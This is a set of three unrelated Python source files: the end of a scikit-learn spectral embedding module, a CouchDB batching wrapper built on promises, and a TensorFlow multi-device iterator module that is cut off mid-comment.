# number of nodes
# lobpcg will fallback to symeig, so we short circuit it
if sparse.isspmatrix(laplacian):
laplacian = laplacian.todense()
lambdas, diffusion_map = symeig(laplacian)
embedding = diffusion_map.T[:n_components] * dd
else:
# lobpcg needs native floats
laplacian = laplacian.astype(np.float)
laplacian = _set_diag(laplacian, 1)
# We increase the number of eigenvectors requested, as lobpcg
# doesn't behave well in low dimension
X = random_state.rand(laplacian.shape[0], n_components + 1)
X[:, 0] = dd.ravel()
lambdas, diffusion_map = lobpcg(laplacian, X, tol=1e-15,
largest=False, maxiter=2000)
embedding = diffusion_map.T[:n_components] * dd
if embedding.shape[0] == 1:
raise ValueError
if drop_first:
return embedding[1:n_components].T
else:
return embedding[:n_components].T
class SpectralEmbedding(BaseEstimator, TransformerMixin):
"""Spectral Embedding for Non-linear Dimensionality Reduction.
Forms an affinity matrix given by the specified function and
applies spectral decomposition to the corresponding graph laplacian.
The resulting transformation is given by the value of the
eigenvectors for each data point.
Parameters
-----------
n_components : integer, default: 2
The dimension of the projected subspace.
eigen_solver : {None, 'arpack', 'lobpcg', or 'amg'}
The eigenvalue decomposition strategy to use. AMG requires pyamg
to be installed. It can be faster on very large, sparse problems,
but may also lead to instabilities.
random_state : int seed, RandomState instance, or None, default : None
A pseudo random number generator used for the initialization of the
lobpcg eigen vectors decomposition when eigen_solver == 'amg'.
affinity : string or callable, default : "nearest_neighbors"
How to construct the affinity matrix.
- 'nearest_neighbors' : construct affinity matrix by knn graph
- 'rbf' : construct affinity matrix by rbf kernel
- 'precomputed' : interpret X as precomputed affinity matrix
- callable : use passed in function as affinity
the function takes in data matrix (n_samples, n_features)
and return affinity matrix (n_samples, n_samples).
gamma : float, optional, default : 1/n_features
Kernel coefficient for rbf kernel.
n_neighbors : int, default : max(n_samples/10 , 1)
Number of nearest neighbors for nearest_neighbors graph building.
Attributes
----------
`embedding_` : array, shape = (n_samples, n_components)
Spectral embedding of the training matrix.
`affinity_matrix_` : array, shape = (n_samples, n_samples)
Affinity_matrix constructed from samples or precomputed.
References
----------
- A Tutorial on Spectral Clustering, 2007
Ulrike von Luxburg
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.165.9323
- On Spectral Clustering: Analysis and an algorithm, 2011
Andrew Y. Ng, Michael I. Jordan, Yair Weiss
http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.19.8100
- Normalized cuts and image segmentation, 2000
Jianbo Shi, Jitendra Malik
http://citeseer.ist.psu.edu/viewdoc/summary?doi=10.1.1.160.2324
"""
def __init__(self, n_components=2, affinity="nearest_neighbors",
gamma=None, random_state=None, eigen_solver=None,
n_neighbors=None):
self.n_components = n_components
self.affinity = affinity
self.gamma = gamma
self.random_state = random_state
self.eigen_solver = eigen_solver
self.n_neighbors = n_neighbors
@property
def _pairwise(self):
return self.affinity == "precomputed"
def _get_affinity_matrix(self, X, Y=None):
"""Caclulate the affinity matrix from data
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples
and n_features is the number of features.
If affinity is "precomputed"
X : array-like, shape (n_samples, n_samples),
Interpret X as precomputed adjacency graph computed from
samples.
Returns
-------
affinity_matrix, shape (n_samples, n_samples)
"""
if self.affinity == 'precomputed':
self.affinity_matrix_ = X
return self.affinity_matrix_
if self.affinity == 'nearest_neighbors':
if sparse.issparse(X):
warnings.warn("Nearest neighbors affinity currently does "
"not support sparse input, falling back to "
"rbf affinity")
self.affinity = "rbf"
else:
self.n_neighbors_ = (self.n_neighbors
if self.n_neighbors is not None
else max(int(X.shape[0] / 10), 1))
self.affinity_matrix_ = kneighbors_graph(X, self.n_neighbors_)
# currently only symmetric affinity_matrix supported
self.affinity_matrix_ = 0.5 * (self.affinity_matrix_ +
self.affinity_matrix_.T)
return self.affinity_matrix_
if self.affinity == 'rbf':
self.gamma_ = (self.gamma
if self.gamma is not None else 1.0 / X.shape[1])
self.affinity_matrix_ = rbf_kernel(X, gamma=self.gamma_)
return self.affinity_matrix_
self.affinity_matrix_ = self.affinity(X)
return self.affinity_matrix_
def fit(self, X, y=None):
"""Fit the model from data in X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples
and n_features is the number of features.
If affinity is "precomputed"
X : array-like, shape (n_samples, n_samples),
Interpret X as precomputed adjacency graph computed from
samples.
Returns
-------
self : object
Returns the instance itself.
"""
random_state = check_random_state(self.random_state)
if isinstance(self.affinity, six.string_types):
if self.affinity not in set(("nearest_neighbors", "rbf",
"precomputed")):
raise ValueError(("%s is not a valid affinity. Expected "
"'precomputed', 'rbf', 'nearest_neighbors' "
"or a callable.") % self.affinity)
elif not hasattr(self.affinity, "__call__"):
raise ValueError(("'affinity' is expected to be an an affinity "
"name or a callable. Got: %s") % self.affinity)
affinity_matrix = self._get_affinity_matrix(X)
self.embedding_ = spectral_embedding(affinity_matrix,
n_components=self.n_components,
eigen_solver=self.eigen_solver,
random_state=random_state)
return self
def fit_transform(self, X, y=None):
"""Fit the model from data in X and transform X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples
and n_features is the number of features.
If affinity is "precomputed"
X : array-like, shape (n_samples, n_samples),
Interpret X as precomputed adjacency graph computed from
samples.
Returns
-------
X_new: array-like, shape (n_samples, n_components)
"""
self.fit(X)
return self.embedding_
|
|
"""This is the core of our couch wrapper. The CouchBatch class defined here
is what end-users can use to efficiently query and update couchdb.
"""
from couchdbkit.exceptions import ResourceConflict
from couchdbkit.exceptions import ResourceNotFound
from couchdbkit.exceptions import BulkSaveError
from functools import partial
from pprint import pprint as pp
import copy
import time
from .exceptions import ActionForbidsDocument
from .exceptions import ActionNeedsDocument
from .exceptions import CreateScheduled
from .exceptions import UpdateScheduled
from .exceptions import OverwriteScheduled
from .exceptions import DeleteScheduled
from .promise import Promise
from .result import DbFailure
from .result import DbValue
from .actions import ReadAction
from .actions import CreateAction
from .actions import OverwriteAction
from .actions import UpdateAction
from .actions import DeleteAction
from .view import ViewResults
class CouchBatch(object):
"""An efficient job batcher for CouchDB. All the database-access functions
of this class (.get, .create, .overwrite, .update, and .delete) return a
promise object without accessing the database. When that promise object's
value() method is called, all the accumulated work that the batch has been
given will ideally be sent to the database in a single operation. Sometimes
reads and retries will be necessary, but this still tends to be more
efficient than doing a ton of reads and writes in the sane ordering that a
programmer wants to use.
Since we batch operations for efficiency, actions on the same key may cause
conflicts. Rather than coming up with creative and disturbing ways for
operations on a single key to interact without touching the database, I've
implemented the more sane optimizations and defined errors for the rest of
the cases. The top of this table is the current activity scheduled for the
key, and the left side is the activity that the user is trying to schedule
on top of the existing activity. When these failures occur, it is the
actual method that raises the exception, rather than a returned promise.
This should make debugging of complicated batch operations a bit more sane.
The general reasoning behind these behaviours is the question of whether the
user could be relying on the failure of the first action as a signal. If
the first action can fail, and the second action would mask that failure,
then the second action is forbidden.
Current Action
New Action
| create | overwrite | update | delete
-----------+---------------+---------------+---------------+----------------
create | Create- | Overwrite- | Update- | DeleteScheduled
| Scheduled is | Scheduled is | Scheduled is | is immediately
| immediately | immediately | immediately | raised
| raised | raised | raised |
| | | |
overwrite | Create- | New activity | Update- | DeleteScheduled
| Scheduled is | overrides | Scheduled is | is immediately
| immediately | existing; both| immediately | raised
| raised | promises tied | raised |
| | to new one | |
| | | |
update | Update is | Update is | Both updates | DeleteScheduled
| applied to new| applied to | joined into | is immediately
| document; both| overwrite doc;| composite; | raised
| promises are | both promises | both promises |
| dependent on | dependent on | tied to update|
| success of | update | success |
| creation | success | |
| | | |
delete | Create- | Scheduled task| Update- | DeleteScheduled
| Scheduled is | becomes delete| Scheduled is | is immediately
| immediately | both promises | immediately | raised
| raised | tied to delete| raised |
| | success | |
this logic is enshrined in _set_action far below...
"""
def __init__(self, couchkit):
self.__ck = couchkit
self.clear_cache()
self._reset()
@property
def ck(self):
return self.__ck
def new_batch(self):
"""Create a new batch that shares this batch's couch connection, but
nothing else. This may be useful when a function passed to this batch's
update or create methods needs to do some database work, since using this
batch from a callback would almost certainly break things.
@return A new CouchBatch instance, sharing this batch's couch connection
"""
return CouchBatch(self.__ck)
def clear_cache(self):
self.__docCache = {}
def forget(self, key):
"""Remove a given document from the cache"""
try:
del self.__docCache[key]
except KeyError:
pass
def _reset(self):
"""Setup the operations"""
self._writes = {}
self._reads = {}
self._stats = { 'read' : 0, 'write' : 0, 'fromcache' : 0 }
def do_reads(self):
"""Fulfill all of the promises outstanding on ".get" requests."""
keys = list(self._reads)
results = self.__ck.all_docs(keys=keys, include_docs=True)
self._stats['read'] += 1
for row in results:
key = row['key']
if row.get('doc'):
_fulfill(self._reads, key, DbValue(row))
self.__docCache[key] = row
elif (row.get('error') == 'not_found') or (
row.get('value', {}).get('deleted')):
_fulfill(self._reads, key, DbFailure(ResourceNotFound(row)))
else:
raise RuntimeError("Unknown couch error type: %s" % row)
def get(self, *keys, **kwargs):
"""Get the desired documents from couch. This will return a dictionary of
key -> Promise.
Notice that the promises' values will be the actual couch response
dictionaries, so the typical keys are 'rev', 'doc', etc. The data you're
looking for is probably under the key of 'doc', unless you want the doc's
revision or something else meta about the document.
@param keys The keys for the documents we want to retreive
@param cached A boolean keyword argument indicating whether we are allowed
to return cached values. Defaults to True.
"""
keys = set(keys)
result = {}
if set(['cached']).union(kwargs) != set(['cached']):
unexpected = list(set(kwargs).difference(['cached']))[0]
raise TypeError(
"get() got an unexpected keyword argument '%s'" % unexpected)
if kwargs.get('cached', True):
for key in keys:
try:
cached = self.__docCache[key]
promise = Promise(key, lambda: None)
promise._fulfill(DbValue(cached))
result[key] = promise
self._stats['fromcache'] += 1
except KeyError:
pass
notcached = keys - set(result)
for key in notcached:
if key in self._reads:
result[key] = self._reads[key].promise
else:
promise = Promise(key, self.do_reads)
result[key] = promise
action = ReadAction(key, promise)
self._reads[key] = action
return result
def view(self, vname, **kwargs):
"""Run a view. It can be useful to run a view through the couch batch
rather than directly through the couchkit object because when include_docs
is given, the docs get added to the batch's cache.
@param vname The name of the view to query
@param kwargs CouchDB view arguments
@return The result of the view
"""
rows = self.__ck.view(vname, **kwargs)
self._stats['read'] += 1
if kwargs.get('include_docs'):
return ViewResults(rows, self.__docCache)
else:
return rows
def all(self, **kwargs):
"""Return all the docs in couch. If include_docs is set, all the docs
returned from this function will be added to this batch's cache. This is
pretty much just a special view, so all the kwargs that a view can take,
this can take as well.
@param kwargs CouchDB view arguments
@return The result of the view
"""
rows = self.__ck.all_docs(**kwargs)
self._stats['read'] += 1
if kwargs.get('include_docs'):
return ViewResults(rows, self.__docCache)
else:
return rows
def do_writes(self, timelimit=5):
"""Run the current batch of write operations. This will fulfill all the
promises we have outstanding on create, overwrite, update, and delete
operations.
@param timelimit How many seconds we have to complete; any commit attempts
made after timelimit will be marked as failures
"""
writes = self._writes
self._writes = {}
start = time.time()
promises = [action.promise for action in writes.values()]
while True:
if not writes:
break
if time.time() > start + timelimit:
break
bulk_write = {}
needcurrent = []
for action in writes.values():
try:
if action.docid in self.__docCache:
doc = action.doc(self.__docCache[action.docid])
else:
doc = action.doc()
except ActionNeedsDocument:
current = self.get(action.docid)[action.docid]
needcurrent.append( (current, action) )
continue
except ActionForbidsDocument:
action.promise._fulfill(DbFailure(_make_conflict(action.docid)))
continue
except Exception, e:
action.promise._fulfill(DbFailure(e))
continue
if doc:
bulk_write[action.docid] = doc
else:
action.promise._fulfill(DbValue(None))
del writes[doc.docid]
for current, action in needcurrent:
try:
value = current.value()
doc = action.doc(value)
except ActionForbidsDocument:
action.promise._fulfill(DbFailure(_make_conflict(action.docid)))
continue
except Exception, e:
action.promise._fulfill(DbFailure(e))
continue
if doc:
if doc['_id'] != action.docid:
assert isinstance(action, CreateAction)
del writes[action.docid]
if doc['_id'] in writes:
action.promise._fulfill(DbFailure(_make_conflict(action.docid)))
continue
action = CreateAction(doc['_id'], doc,
action.promise, action.resolver)
writes[doc['_id']] = action
bulk_write[action.docid] = doc
else:
action.promise._fulfill(DbValue(None))
del writes[action.docid]
try:
self._stats['write'] += 1
results = self.__ck.bulk_save(bulk_write.values())
except BulkSaveError, e:
results = e.results
retries = []
for result in results:
key = result['id']
action = writes[key]
if 'error' in result:
if action.can_retry:
retries.append(action)
self.forget(action.docid)
else:
action.promise._fulfill(DbFailure(_make_conflict(result)))
else:
action.promise._fulfill(DbValue(result))
doc = bulk_write[key]
if doc.get('_deleted') == True:
self.forget(key)
else:
doc = copy.deepcopy(doc)
doc['_rev'] = result['rev']
self.__docCache[key] = {
'id' : key,
'key' : key,
'value' : {'rev':result['rev']},
'doc' : doc,
}
writes = dict( (action.docid, action) for action in retries )
if writes:
for action in writes.values():
action.promise._fulfill(DbFailure(_make_conflict(action.docid)))
return promises
def create(self, key, document, conflict_fn=None, converter=None):
"""Create a new document. The promise returned from this will have a
value that either raises an exception or returns a dictionary with the
keys "rev" and "id".
Create will fail if the document already exists in couch; this means that
if we have the key in our doc cache, or if the document is scheduled to be
created already, the returned promise will be a failure.
@param key The key at which to store the given document
@param document The data to store (should be a dictionary)
@param conflict_fn A function that accepts the document we're trying to
write and the currently-stored document, and which
can return a new document to try writing or None to
indicate a failure
@param converter A function that, once the promise is given a value,
will immediately be called with that promise. If it
returns a truthy value, that value will be used as
the promise's value instead of whatever it would
have had.
@raise ScheduleError If something is already scheduled to happen for this
key
"""
if key in self.__docCache:
# We know that the key is in our cache, and thus is known to exist.
# We'll return a promise that's already set as a failure.
promise = Promise(key, lambda: None, gotresult_fn=converter)
promise._fulfill(DbFailure(_make_conflict(key)))
return promise
def action_fn(promise):
return CreateAction(key,
document,
promise,
conflict_resolver=conflict_fn)
promise = _set_action(self._writes, key, self.do_writes, action_fn,
converter)
return promise
def overwrite(self, key, document, revision=None, converter=None):
"""Stomp over whatever document already exists in the database with the
given key, or create a new document if needed. The data given by document
is what will be in the database once we commit.
@param key The key at which to store our data
@param document The data to store
@param revision The current database rev of the doc, if known
@param converter A function that, once the promise is given a value,
will immediately be called with that promise. If it
returns a truthy value, that value will be used as
the promise's value instead of whatever it would
have had.
@raise ScheduleError If there is already an anything scheduled other than
another overwrite.
"""
promise = _set_action(self._writes, key, self.do_writes,
partial(OverwriteAction, key, document, revision), converter)
return promise
def update(self, key, updatefn, converter=None):
"""Queue up a document update function. On commit, the document
associated with given key will be retrieved, and the function will be
called on the document. If the document does not exist in the database,
the returned promise's value will raise a ResourceNotFound exception;
otherwise, the value will be the update response from the database, which
is basically a dictionary with a rev and a key (the key you gave this
function, hopefully)
The result of the function will be the new value that will be stored (at
least, given to the other updates for the document). If the update
function returns None, it will have no effect on the stored value of the
document.
@param key The key of the document to update
@param updatefn The function that will transform the document data
@param converter A function that, once the promise is given a value,
will immediately be called with that promise. If it
returns a truthy value, that value will be used as
the promise's value instead of whatever it would
have had.
@raise ScheduleError If there is already a delete scheduled for this key
"""
promise = _set_action(self._writes, key, self.do_writes,
partial(UpdateAction, key, updatefn), converter)
return promise
def delete(self, key, converter=None):
"""Delete a document. The promise returned here will contain a dictionary
with the keys "rev", "id", and "ok", or it will raise a ResourceNotFound
exception.
@param key The key of the document to delete.
@param converter A function that, once the promise is given a value,
will immediately be called with that promise. If it
returns a truthy value, that value will be used as
the promise's value instead of whatever it would
have had.
@raise ScheduleError If anything other than an overwrite is already
scheduled for this key
"""
promise = _set_action(self._writes, key, self.do_writes,
partial(DeleteAction, key), converter)
return promise
def _fulfill(actions, key, result):
"""Complete the promises outstanding for the given document key.
@param actions The key -> action dictionary for read or write actions
@param key The couch key for the promise
@param result The DbResult to record
"""
if key in actions:
actions[key].promise._fulfill(result)
del actions[key]
def _set_action(actions, key, completer_fn, action_fn, converter_fn):
"""Assign (or re-assign) the action for the given key. This generates a new
Promise chained to the promise of the already-present action for the key (if
any). It then gives that promise to the given action_fn to generate a new
Action, which it stores in the actions dictionary. The new promise is
returned from this function.
@param actions The dictionary of key -> action
@param key The key we want to set the action for
@param completer_fn The function the promise needs to call when its value
is requested
@param action_fn The function that will give us an Action
@param converter_fn A function that, once the promise is given a value,
will immediately be called with that promise. If it
returns a truthy value, that value will be used as
the promise's value instead of whatever it would
have had.
@return A new promise object to give to the user
"""
try:
existing = actions[key]
prev_promise = existing.promise
except KeyError:
existing = None
prev_promise = None
promise = Promise(key, completer_fn, prev_promise, converter_fn)
new = action_fn(promise)
if isinstance(existing, CreateAction):
if isinstance(new, CreateAction):
raise CreateScheduled
elif isinstance(new, OverwriteAction):
raise CreateScheduled
elif isinstance(new, UpdateAction):
new, promise = _update_doc(key, new, existing, promise)
elif isinstance(new, DeleteAction):
raise CreateScheduled
elif isinstance(existing, OverwriteAction):
if isinstance(new, CreateAction):
raise OverwriteScheduled
elif isinstance(new, OverwriteAction):
# This will just do the natural thing, which is the new overwrite taking
# precedence; the promises are already chained
pass
elif isinstance(new, UpdateAction):
new, promise = _update_doc(key, new, existing, promise)
elif isinstance(new, DeleteAction):
# This is the natural action; new is already a delete, and the promises
# are already chained
pass
elif isinstance(existing, UpdateAction):
if isinstance(new, CreateAction):
raise UpdateScheduled
elif isinstance(new, OverwriteAction):
raise UpdateScheduled
elif isinstance(new, UpdateAction):
# Compose the new update function with the existing one, create a new
# update action from that
origNew = new
def composed(doc):
fromExisting = existing.doc({'doc':doc})
fromNew = origNew.doc({'doc':fromExisting})
return fromNew
new = UpdateAction(key, composed, promise)
elif isinstance(new, DeleteAction):
raise UpdateScheduled
elif isinstance(existing, DeleteAction):
# The chart for existing = delete is pretty simple...
raise DeleteScheduled
actions[key] = new
return promise
def _update_doc(key, new, existing, promise):
"""Pass the doc to be created by the existing through the function stored in
the new, wrap the result in a create. If the update function throws an
exception, we will make a failed promise and throw away the update; if the
update function returns None, we will make a successful promise with the
value of None and throw away the update
"""
assert isinstance(new, UpdateAction)
assert (isinstance(existing, CreateAction)
or isinstance(existing, OverwriteAction) )
try:
updated = new.doc({'doc':existing.doc()})
except Exception, e:
new = existing
promise = Promise(key, lambda: None)
promise._fulfill(DbFailure(e))
else:
if updated:
if isinstance(existing, CreateAction):
new = CreateAction(existing.docid, updated, promise, existing.resolver)
else:
new = OverwriteAction(existing.docid, updated, None, promise)
else:
new = existing
promise = Promise(key, lambda: None)
promise._fulfill(DbValue(None))
return new, promise
def _make_conflict(key):
"""Generate a ResourceConflict exception object for the given key"""
conflict = ResourceConflict({
'id' : key,
'error' : 'conflict',
'reason' : 'Document update conflict.',
})
return conflict
|
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python wrapper for prefetching_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import iterator_ops
from tensorflow.python.data.util import structure
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.framework import composite_tensor
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_spec
from tensorflow.python.framework import type_spec
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import gen_dataset_ops
from tensorflow.python.ops import resource_variable_ops
class _PerDeviceGenerator(dataset_ops.DatasetV2):
"""A `dummy` generator dataset."""
def __init__(self, shard_num, multi_device_iterator_resource, incarnation_id,
source_device, element_spec):
self._element_spec = element_spec
multi_device_iterator_string_handle = (
gen_dataset_ops.multi_device_iterator_to_string_handle(
multi_device_iterator_resource))
# TODO(b/124254153): Enable autograph once the overhead is low enough.
@function.defun(autograph=False) # Pure graph code.
def _init_func():
return multi_device_iterator_string_handle
init_func_concrete = _init_func.get_concrete_function()
# TODO(b/124254153): Enable autograph once the overhead is low enough.
@function.defun(autograph=False) # Pure graph code.
def _remote_init_func():
return functional_ops.remote_call(
target=source_device,
args=init_func_concrete.captured_inputs,
Tout=[dtypes.string],
f=init_func_concrete)
self._init_func = _remote_init_func.get_concrete_function()
self._init_captured_args = self._init_func.captured_inputs
# TODO(b/124254153): Enable autograph once the overhead is low enough.
@function.defun(
input_signature=[tensor_spec.TensorSpec([], dtypes.string)],
autograph=False) # Pure graph code.
def _next_func(string_handle):
# pylint: disable=protected-access
multi_device_iterator = (
gen_dataset_ops.multi_device_iterator_from_string_handle(
string_handle=string_handle,
output_types=structure.get_flat_tensor_types(self._element_spec),
output_shapes=structure.get_flat_tensor_shapes(
self._element_spec)))
return gen_dataset_ops.multi_device_iterator_get_next_from_shard(
multi_device_iterator=multi_device_iterator,
shard_num=shard_num,
incarnation_id=incarnation_id,
output_types=structure.get_flat_tensor_types(self._element_spec),
output_shapes=structure.get_flat_tensor_shapes(self._element_spec))
next_func_concrete = _next_func.get_concrete_function()
# TODO(b/124254153): Enable autograph once the overhead is low enough.
@function.defun_with_attributes(
input_signature=[tensor_spec.TensorSpec([], dtypes.string)],
attributes={"experimental_ints_on_device": True},
autograph=False) # Pure graph code.
def _remote_next_func(string_handle):
return functional_ops.remote_call(
target=source_device,
args=[string_handle] + next_func_concrete.captured_inputs,
Tout=structure.get_flat_tensor_types(self._element_spec),
f=next_func_concrete)
self._next_func = _remote_next_func.get_concrete_function()
self._next_captured_args = self._next_func.captured_inputs
self._incarnation_id_index = -1
for i, arg in enumerate(self._next_captured_args):
if arg is incarnation_id:
self._incarnation_id_index = i
# TODO(b/124254153): Enable autograph once the overhead is low enough.
@function.defun(
input_signature=[tensor_spec.TensorSpec([], dtypes.string)],
autograph=False) # Pure graph code.
def _finalize_func(unused_string_handle):
return array_ops.constant(0, dtypes.int64)
finalize_func_concrete = _finalize_func.get_concrete_function()
# TODO(b/124254153): Enable autograph once the overhead is low enough.
@function.defun(
input_signature=[tensor_spec.TensorSpec([], dtypes.string)],
autograph=False) # Pure graph code.
def _remote_finalize_func(string_handle):
return functional_ops.remote_call(
target=source_device,
args=[string_handle] + finalize_func_concrete.captured_inputs,
Tout=[dtypes.int64],
f=finalize_func_concrete)
self._finalize_func = _remote_finalize_func.get_concrete_function()
self._finalize_captured_args = self._finalize_func.captured_inputs
variant_tensor = gen_dataset_ops.generator_dataset(
self._init_captured_args,
self._next_captured_args,
self._finalize_captured_args,
init_func=self._init_func,
next_func=self._next_func,
finalize_func=self._finalize_func,
**self._flat_structure)
super(_PerDeviceGenerator, self).__init__(variant_tensor)
def _inputs(self):
# TODO(b/116506223): Determine which datasets should be used as inputs here.
return []
@property
def element_spec(self):
return self._element_spec
class _ReincarnatedPerDeviceGenerator(dataset_ops.DatasetV2):
"""Creates a _PerDeviceGenerator-like dataset with a new incarnation_id.
Re-uses the functions from the provided per_device_dataset and just switches
out the function argument corresponding to the incarnation_id.
"""
def __init__(self, per_device_dataset, incarnation_id):
# pylint: disable=protected-access
self._element_spec = per_device_dataset.element_spec
self._init_func = per_device_dataset._init_func
self._init_captured_args = self._init_func.captured_inputs
self._next_func = per_device_dataset._next_func
self._next_captured_args = per_device_dataset._next_captured_args
# The captured arguments to the next_func are string_handle, incarnation_id.
# We update the incarnation id to the new one.
self._next_captured_args[
per_device_dataset._incarnation_id_index] = incarnation_id
self._finalize_func = per_device_dataset._finalize_func
self._finalize_captured_args = per_device_dataset._finalize_captured_args
variant_tensor = gen_dataset_ops.generator_dataset(
self._init_captured_args,
self._next_captured_args,
self._finalize_captured_args,
init_func=self._init_func,
next_func=self._next_func,
finalize_func=self._finalize_func,
**self._flat_structure)
super(_ReincarnatedPerDeviceGenerator, self).__init__(variant_tensor)
def _inputs(self):
# TODO(b/116506223): Determine which datasets should be used as inputs here.
return []
@property
def element_spec(self):
return self._element_spec
def _create_device_dataset(prototype_ds, incarnation_id, prefetch_buffer_size,
experimental_slack):
"""Uses _prototype_device_datasets[i] to build a dataset for the device."""
ds = _ReincarnatedPerDeviceGenerator(prototype_ds, incarnation_id)
if prefetch_buffer_size > 0:
if experimental_slack:
ds = dataset_ops.PrefetchDataset(ds, prefetch_buffer_size, slack_period=1)
else:
ds = ds.prefetch(prefetch_buffer_size)
# TODO(jsimsa): Enable auto-tuning and optimizations when supported for
# non-CPU devices.
options = dataset_ops.Options()
options.experimental_optimization.apply_default_optimizations = False
options.experimental_optimization.autotune = False
ds = ds.with_options(options)
return ds
class MultiDeviceIterator(object):
"""An iterator over multiple devices."""
def __init__(self,
dataset,
devices,
max_buffer_size=1,
prefetch_buffer_size=1,
source_device="/cpu:0"):
"""Constructs a MultiDeviceIterator.
Args:
dataset: The input dataset to be iterated over.
devices: The list of devices to fetch data to.
max_buffer_size: Maximum size of the host side per device buffer to keep.
prefetch_buffer_size: if > 0, then we setup a buffer on each device to
prefetch into.
source_device: The host device to place the `dataset` on. In order to
prevent deadlocks, if the prefetch_buffer_size is greater than the
max_buffer_size, we set the max_buffer_size to prefetch_buffer_size.
"""
options = dataset_ops.Options()
options.experimental_distribute.num_devices = len(devices)
dataset = dataset.with_options(options)
self._dataset = dataset._apply_options() # pylint: disable=protected-access
self._experimental_slack = dataset.options().experimental_slack
self._devices = devices
self._source_device = source_device
self._source_device_tensor = ops.convert_to_tensor(source_device)
self._max_buffer_size = max_buffer_size
self._prefetch_buffer_size = prefetch_buffer_size
if self._prefetch_buffer_size > self._max_buffer_size:
self._max_buffer_size = self._prefetch_buffer_size
# Create the MultiDeviceIterator.
with ops.device(self._source_device):
# TODO(b/121378567): Get rid of this shared_name hack.
shared_name = ""
if context.executing_eagerly():
shared_name = context.shared_name()
self._multi_device_iterator_resource = (
gen_dataset_ops.multi_device_iterator(
devices=self._devices,
shared_name=shared_name,
container="",
**self._dataset._flat_structure)) # pylint: disable=protected-access
if context.executing_eagerly():
# Delete the resource when this object is deleted
self._resource_deleter = resource_variable_ops.EagerResourceDeleter(
handle=self._multi_device_iterator_resource,
handle_device=self._source_device)
# The incarnation ID is used to ensure consistency between the per-device
# iterators and the multi-device iterator.
self._incarnation_id = gen_dataset_ops.multi_device_iterator_init(
self._dataset._variant_tensor, # pylint: disable=protected-access
self._multi_device_iterator_resource,
max_buffer_size=self._max_buffer_size)
self._prototype_device_datasets = []
for i, device in enumerate(self._devices):
with ops.device(device):
ds = _PerDeviceGenerator(i, self._multi_device_iterator_resource,
self._incarnation_id,
self._source_device_tensor,
self._dataset.element_spec)
self._prototype_device_datasets.append(ds)
# TODO(rohanj): Explore the possibility of the MultiDeviceIterator to
# initialize the device side of the pipeline. This would allow the
# MultiDeviceIterator to choose, for example, to move some transformations
# into the device side from its input. It might be useful in rewriting.
# Create the per device iterators.
self._device_iterators = []
for i, device in enumerate(self._devices):
with ops.device(device):
ds = _create_device_dataset(self._prototype_device_datasets[i],
self._incarnation_id,
self._prefetch_buffer_size,
self._experimental_slack)
if context.executing_eagerly():
self._device_iterators.append(dataset_ops.make_one_shot_iterator(ds))
else:
self._device_iterators.append(
dataset_ops.make_initializable_iterator(ds))
if not context.executing_eagerly():
device_iterator_initializers = [
iterator.initializer for iterator in self._device_iterators
]
self._initializer = control_flow_ops.group(*device_iterator_initializers)
def _create_device_dataset(self, i):
"""Uses _prototype_device_datasets[i] to build a dataset for the device."""
ds = self._prototype_device_datasets[i]
ds = _ReincarnatedPerDeviceGenerator(ds, self._incarnation_id)
if self._prefetch_buffer_size > 0:
if self._experimental_slack:
ds = dataset_ops.PrefetchDataset(
ds, self._prefetch_buffer_size, slack_period=1)
else:
ds = ds.prefetch(self._prefetch_buffer_size)
# TODO(jsimsa): Enable auto-tuning and optimizations when supported for
# non-CPU devices.
options = dataset_ops.Options()
options.experimental_optimization.apply_default_optimizations = False
options.experimental_optimization.autotune = False
ds = ds.with_options(options)
return ds
def get_next(self, device=None):
"""Returns the next element given a `device`, else returns all in a list."""
if device is not None:
index = self._devices.index(device)
return self._device_iterators[index].get_next()
result = []
for i, device in enumerate(self._devices):
with ops.device(device):
result.append(self._device_iterators[i].get_next())
return result
def get_next_as_optional(self):
result = []
for i, device in enumerate(self._devices):
with ops.device(device):
result.append(self._device_iterators[i].get_next_as_optional())
return result
@property
def initializer(self):
if context.executing_eagerly():
return control_flow_ops.no_op()
return self._initializer
def _eager_reset(self):
"""Resets the MultiDeviceIterator in eager mode."""
if not ops.executing_eagerly_outside_functions():
raise ValueError("Eager reset is only supported in eager mode.")
# pylint: disable=protected-access
self._incarnation_id = gen_dataset_ops.multi_device_iterator_init(
self._dataset._variant_tensor,
self._multi_device_iterator_resource,
max_buffer_size=self._max_buffer_size)
for i, device in enumerate(self._devices):
with ops.device(device):
ds = _create_device_dataset(self._prototype_device_datasets[i],
self._incarnation_id,
self._prefetch_buffer_size,
self._experimental_slack)
# Reset the device iterator resources with the new dataset.
ds_variant = ds._variant_tensor
gen_dataset_ops.make_iterator(
ds_variant, self._device_iterators[i]._iterator_resource)
@property
def element_spec(self):
return self._dataset.element_spec
class MultiDeviceIteratorResourceDeleter(object):
"""An object which cleans up a Multi Device Iterator resource.
An alternative to defining a __del__ method on an object. Even if the parent
object is part of a reference cycle, the cycle will be collectible.
"""
__slots__ = [
"_deleter", "_multi_device_iterator", "_iterators", "_device",
"_eager_mode"
]
def __init__(self, multi_device_iterator, iterators, device, deleter):
self._deleter = deleter
self._multi_device_iterator = multi_device_iterator
self._iterators = iterators
self._device = device
self._eager_mode = context.executing_eagerly()
def __del__(self):
with ops.device(self._device):
# Make sure the resource is deleted in the same mode as it was created in.
# We pass in the iterator handles as inputs to the op to make sure that
